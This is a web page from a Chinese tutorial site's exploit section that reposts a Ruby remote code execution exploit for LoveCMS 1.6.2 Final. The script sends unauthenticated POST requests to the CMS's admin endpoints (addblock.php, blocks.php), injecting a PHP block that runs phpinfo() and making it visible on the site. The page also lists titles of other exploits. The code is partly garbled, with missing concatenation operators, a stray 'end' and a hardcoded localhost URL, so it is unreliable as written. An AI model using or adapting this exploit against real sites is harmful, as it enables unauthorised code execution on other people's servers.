手机
当前位置:查字典教程网 >网络安全 >Exploit >LoveCMS 1.6.2 Final Remote Code Execution Exploit
LoveCMS 1.6.2 Final Remote Code Execution Exploit
摘要:#!/usr/bin/ruby###ExploitbyPoMdaPiMp!##---------------------##pomdapim...

#!/usr/bin/ruby

#

## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)

##

## LoveCMS Exploit Series

## Episode 1: adding a side block

##

## Description: add some php into a block container

## on the side of the site. phpinfo() is called.

##

## Usage: ./LoveCMS_1_blocks.rb <host>

## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/

##

## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

# require 'net/http'

require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host

# --

puts " LoveCMS Exploit Series. #1: Adding side blocks."

puts

puts " : Attacking host: " @host # --

# Insert a new block

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),

{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})

puts " :: Block inserted." # --

# Build post variable for next step

post_vars = {'submit' => 1}

(1..50).each do |id|

post_vars['position' id.to_s] = 1

post_vars['height' id.to_s] = 1

post_vars['visible' id.to_s] = 1

end

# Make the block visible

res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )

puts " :: Blocks displayed." # --

puts

puts " - Visit " @host

end

【LoveCMS 1.6.2 Final Remote Code Execution Exploit】相关文章:

Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

精品推荐
分类导航